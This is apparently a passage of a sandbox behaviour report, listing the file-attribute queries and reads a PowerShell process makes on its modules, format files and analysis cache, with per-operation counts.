| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MMAgent\MMAgent.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\MsDtc\MsDtc.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PnpDevice\PnpDevice.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PrintManagement\PrintManagement.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ScheduledTasks\ScheduledTasks.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbWitness\SmbWitness.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\StartLayout\StartLayout.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Storage\Storage.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TLS\TLS.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\TroubleshootingPack.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TrustedPlatformModule\TrustedPlatformModule.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\VpnClient\VpnClient.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Wdac\Wdac.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsDeveloperLicense\WindowsDeveloperLicense.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\WindowsErrorReporting.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsSearch\WindowsSearch.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\WindowsUpdate\WindowsUpdate.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.psm1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.cdxml | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.xaml | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
4 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ac90668-b7fb-46d6-80e6-01a947284e18 | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
4 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 | type = file_type |
|
2 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
5 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | type = file_type |
|
4 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_attributes |
|
6 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_type |
|
4 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_type |
|
2 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\PSGetModuleInfo.xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Security | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
4 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
2 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
4 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46610b03-43d8-466e-ac05-954274c00100 | type = file_type |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management | type = file_attributes |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
4 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28 | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28 | type = file_type |
|
2 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | type = file_type |
|
2 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | type = file_attributes |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 537 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
33 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3055 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 17, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 950 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
68 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 452 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | size = 4096, size_out = 4096 |
|
51 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | size = 4096, size_out = 2970 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | size = 102, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
50 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 1668 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 380, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 1 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 266 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 4096, size_out = 1528 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 520, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 4096, size_out = 1509 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 539, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 | size = 4096, size_out = 2756 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 | size = 316, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 | size = 4096, size_out = 737 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config | size = 4096, size_out = 4096 |
|
8 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config | size = 4096, size_out = 3215 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 43, size_out = 43 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 9, size_out = 9 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 11, size_out = 11 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 3483 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 4096, size_out = 1528 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 520, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 4096, size_out = 1509 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 539, size_out = 0 |
|
1 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | size = 688, size_out = 0 |
|
1 | |
| Read | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | size = 4096, size_out = 664 |
|
1 | |
| Read | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 43, size_out = 43 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 9, size_out = 9 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 11, size_out = 11 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | size = 4096, size_out = 3483 |
|
